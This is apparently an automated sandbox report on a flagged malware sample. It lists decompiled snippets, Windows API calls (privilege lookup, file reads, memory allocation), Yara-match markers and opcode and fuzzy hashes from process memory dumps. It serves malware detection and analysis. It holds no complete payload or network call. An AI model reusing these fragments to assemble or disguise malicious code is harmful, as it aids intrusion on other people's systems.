                                                                        				_t8 = LookupPrivilegeValueW(_t9, _t7, ??); // executed
                                                                        				return _t8;
                                                                        			}








                                                                        0x00418620
                                                                        0x00418623
                                                                        0x00418626
                                                                        0x0041863a
                                                                        0x0041863b
                                                                        0x0041863d
                                                                        0x00418642
                                                                        0x00418642
                                                                        0x00418644
                                                                        0x0041864a
                                                                        0x00418650
                                                                        0x00418654

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 65ed4f4e398b5a501d99ba22b0253975388ea218ff8d7d6300220ec8937b88e2
                                                                        • Instruction ID: 79b95261fd4bca5113d7cb2a01fc223ee9f78c87d455dc60d2b0d5c8d6171ae7
                                                                        • Opcode Fuzzy Hash: 65ed4f4e398b5a501d99ba22b0253975388ea218ff8d7d6300220ec8937b88e2
                                                                        • Instruction Fuzzy Hash: AAE086746003007BC714DF68CC85FC737699F49754F054499BA4C1B242D530A900CAE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                                                        • Instruction ID: 7f541cce7341b726ca3189041fa932a6336af74422518780cffbe53c04ca977f
                                                                        • Opcode Fuzzy Hash: 533862cca9585a24181fa9b0be052c9c4ad18b8153eb62aa641dee1532fbfa85
                                                                        • Instruction Fuzzy Hash: 06B092B29024D9CAEB11E7B05A08B2B7E00BBE0741F26C562E2020685B4779C4D1F6F6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                        • Instruction ID: a8cf857df87f6bd03865a0eb8afb916004f5972a04dd5b3f14e8d12fa6ce18cf
                                                                        • Opcode Fuzzy Hash: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                        • Instruction Fuzzy Hash: 4F90026130101402D202616944146460409D7D1385F91C422E1414555D86658993F1B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                        • Instruction ID: 0b268831c4c1ab52680674bb3939a4bb22d2de30e32814bef46280208555ae7a
                                                                        • Opcode Fuzzy Hash: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                        • Instruction Fuzzy Hash: C890027124101402D241716944046460409A7D0381F91C422A0414554E86958A96FAE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                        • Instruction ID: acf0d5f479c79240ac9ac3f0f0c07aefe48256605cffbc211af4fdd1922508f2
                                                                        • Opcode Fuzzy Hash: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                        • Instruction Fuzzy Hash: 119002A1601150434640B16948044465415A7E1341391C531A0444560C86A88895E2E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                        • Instruction ID: a40fc812ad20c0d0bfccf7cd46ae6051b02e7a62ad9cbeb0bb490aa243aa8551
                                                                        • Opcode Fuzzy Hash: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                        • Instruction Fuzzy Hash: 9C9002A121101042D20461694404746044597E1341F51C422A2144554CC5698CA1A1A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                        • Instruction ID: 9d87ebb25f7e16c674cf0bdcc66ad79c6c983cba86160841acaefd05b65c1d6a
                                                                        • Opcode Fuzzy Hash: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                        • Instruction Fuzzy Hash: 329002A120141403D24065694804647040597D0342F51C421A2054555E8A698C91B1B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                        • Instruction ID: f4c5860114ddf17f9db68ecdf7c04f689360a1830384660e23aad6d85af66e4b
                                                                        • Opcode Fuzzy Hash: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                        • Instruction Fuzzy Hash: 1F90026120145442D24062694804B4F450597E1342F91C429A4146554CC9558895A7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                        • Instruction ID: f212c6223a443c7e31d175cbe2b1ac146a28fab09b18ce3e74788c09f461f788
                                                                        • Opcode Fuzzy Hash: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                        • Instruction Fuzzy Hash: 4590027120141402D20061694808787040597D0342F51C421A5154555E86A5C8D1B5B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                        • Instruction ID: 35a2c4a2356be97c713b9b11c77802ac3579c4f72cf500f85071e0fb5cbe680b
                                                                        • Opcode Fuzzy Hash: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                        • Instruction Fuzzy Hash: 1990027120145002D2407169844464B5405A7E0341F51C821E0415554C86558896E2A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                        • Instruction ID: d2fedbcecf7a950f5374f74c095b12ae17afb836810d99b7043c15328ee36e23
                                                                        • Opcode Fuzzy Hash: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                        • Instruction Fuzzy Hash: FB90026124101802D240716984147470406D7D0741F51C421A0014554D865689A5B6F1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                                                        • Instruction ID: e887574115e6291994776ade48fdfe3a4aa9aeef2f1fd83914d63565fb87ff4c
                                                                        • Opcode Fuzzy Hash: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                                                        • Instruction Fuzzy Hash: 3890027120101802D204616948046C6040597D0341F51C421A6014655E96A588D1B1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                                                        • Instruction ID: aa12941b71ce22c5ec157d25e5727ab8101b1e66847fe9b6ce386c495632ef30
                                                                        • Opcode Fuzzy Hash: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                                                        • Instruction Fuzzy Hash: 049002E1201150924600A2698404B4A490597E0341B51C426E1044560CC5658891E1B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                                                        • Instruction ID: dcf145d2a0992ac5f6972e22c51be163b7bb9ad120272f0053a6651c5f78a39a
                                                                        • Opcode Fuzzy Hash: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                                                        • Instruction Fuzzy Hash: 3D900271A05010129240716948146864406A7E0781B55C421A0504554C89948A95A3E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                                                        • Instruction ID: 65897f1f7df915f69680ae797b9bea826366557d757b4b143bfcaf83edec5a20
                                                                        • Opcode Fuzzy Hash: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                                                        • Instruction Fuzzy Hash: C4900265221010020245A569060454B0845A7D6391391C425F1406590CC66188A5A3A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                                                        • Instruction ID: a6de25885d4ddb5bc7472cdb7a1e82fd784322be88a4c22f1469f4e8246c785f
                                                                        • Opcode Fuzzy Hash: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                                                        • Instruction Fuzzy Hash: CB90027120101842D20061694404B86040597E0341F51C426A0114654D8655C891B5A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                                                        • Instruction ID: 3aae62aa8c56198208e2baf391671b09e3792a5d2cc022712fd769eeda9bed22
                                                                        • Opcode Fuzzy Hash: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                                                        • Instruction Fuzzy Hash: 4690027160501802D25071694414786040597D0341F51C421A0014654D87958A95B6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                                                        • Instruction ID: ac43491b3d4451088206f3c0df52bd3e76dbb0b46fbd301310f6a850597c6de2
                                                                        • Opcode Fuzzy Hash: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                                                        • Instruction Fuzzy Hash: 7490027120505842D24071694404A86041597D0345F51C421A0054694D96658D95F6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                                                        • Instruction ID: 0447279c205caa384f4d89fc08c58219dd3feb71ae969dae4871b449b9b397d0
                                                                        • Opcode Fuzzy Hash: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                                                        • Instruction Fuzzy Hash: BA90026160501402D24071695418746041597D0341F51D421A0014554DC6998A95B6E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                                                        • Instruction ID: 4f9cfaac5c4b9bc5f350f3032fa2162baaebd8ffb11511f72aef7ae4d89ae8fb
                                                                        • Opcode Fuzzy Hash: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                                                        • Instruction Fuzzy Hash: 05900271301010529600A6A95804A8A450597F0341B51D425A4004554C859488A1A1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                                                        • Instruction ID: 6161ed1c96c8455890c1f4271aa2edab8ebf969a51aa5f7db855893b9f930ef0
                                                                        • Opcode Fuzzy Hash: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                                                        • Instruction Fuzzy Hash: 0190027120101403D20061695508747040597D0341F51D821A0414558DD6968891B1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                                                        • Instruction ID: a9771e8ba13c254f64fc4a33f4a49f6398ce908e05151f7d14d6a5d11b408f71
                                                                        • Opcode Fuzzy Hash: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                                                        • Instruction Fuzzy Hash: EA90026120505442D20065695408A46040597D0345F51D421A1054595DC6758891F1B1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                                                        • Instruction ID: 5847bf32bf62a41ba9cdc3f47874bcb6937f8d28ab153e4a53c387a6bb3fdf9d
                                                                        • Opcode Fuzzy Hash: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                                                        • Instruction Fuzzy Hash: 6790027520505442D60065695804AC7040597D0345F51D821A041459CD869488A1F1A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: e3402ee03f312e289058b1bfefd1d935daa076871646f2a9186fa30f0aef9e36
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                        				void* _t7;
                                                                        				intOrPtr _t9;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr* _t12;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr* _t15;
                                                                        
                                                                        				_t13 = __edx;
                                                                        				_push(_a4);
                                                                        				_t14 =  *[fs:0x18];
                                                                        				_t15 = _t12;
                                                                        				_t7 = E00A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                        				_push(_t13);
                                                                        				E00A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                        				_t9 =  *_t15;
                                                                        				if(_t9 == 0xffffffff) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                        				}
                                                                        				_push(_t10);
                                                                        				_push(_t15);
                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                        				return E00A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                        			}










                                                                        0x00a5fdda
                                                                        0x00a5fde2
                                                                        0x00a5fde5
                                                                        0x00a5fdec
                                                                        0x00a5fdfa
                                                                        0x00a5fdff
                                                                        0x00a5fe0a
                                                                        0x00a5fe0f
                                                                        0x00a5fe17
                                                                        0x00a5fe1e
                                                                        0x00a5fe19
                                                                        0x00a5fe19
                                                                        0x00a5fe19
                                                                        0x00a5fe20
                                                                        0x00a5fe21
                                                                        0x00a5fe22
                                                                        0x00a5fe25
                                                                        0x00a5fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A5FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A5FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.691700795.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                        • Instruction ID: 96e45386d4b3a81d1b37ac4873e997ea375468bc9e47f36266e5cb260fc2406d
                                                                        • Opcode Fuzzy Hash: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                        • Instruction Fuzzy Hash: 8DF0F632600601BFDA201B55DD03F63BF6AEB84731F240314FA28565E1DA72F86096F0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00713B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00713B87,007A002E,00000000,00000060,00000000,00000000), ref: 007181FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 1fb66217961641b9517a34ae70a114bfefc7a234bfa0ebdbecd5b6ca9970c8ff
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: AFF0B6B2200208ABCB48CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL( =q,?,?,00713D20,00000000,FFFFFFFF), ref: 00718305
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: =q
                                                                        • API String ID: 3535843008-2330367718
                                                                        • Opcode ID: 78a2f41bd7a4a01db518a76d96445a5a9d3aacec5d623196880ddfda99e87ade
                                                                        • Instruction ID: 4bf7dd38bda55a9461bca49db0803eaaee27bcf164c574c19279a2d2afdd7e97
                                                                        • Opcode Fuzzy Hash: 78a2f41bd7a4a01db518a76d96445a5a9d3aacec5d623196880ddfda99e87ade
                                                                        • Instruction Fuzzy Hash: 41E0C236240314BBDB10EFD8CC89EDB3768EF48310F144054BE585B382CA30EA0087D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL( =q,?,?,00713D20,00000000,FFFFFFFF), ref: 00718305
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID: =q
                                                                        • API String ID: 3535843008-2330367718
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 11640d6942ae41188c5f4c978ed5826d071d96eaea25ac064fa7e21dca9a32f0
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 55D01275200314BBD710EF98DC45ED7775CEF48750F154455BA585B382C930FA0086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00713A01,?,?,?,?,00713A01,FFFFFFFF,?,B=q,?,00000000), ref: 007182A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: ee8f85d4df9f39ed9153f7a8aa2baff6f782add93add6a1397ccf70642729237
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: BEF0A4B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E9518BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 007183C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: e52a21f8ab7204c87dd8f60fedc4921cbd8f6d702e8a9f4e344a0417ea1ce4fc
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: A3F015B2200208ABCB14DF89DC81EEB77ADAF8C750F118148BE0897381CA30F910CBE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.910535449.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true
                                                                        • Associated: 00000007.00000002.910657081.000000000488B000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.910667906.000000000488F000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
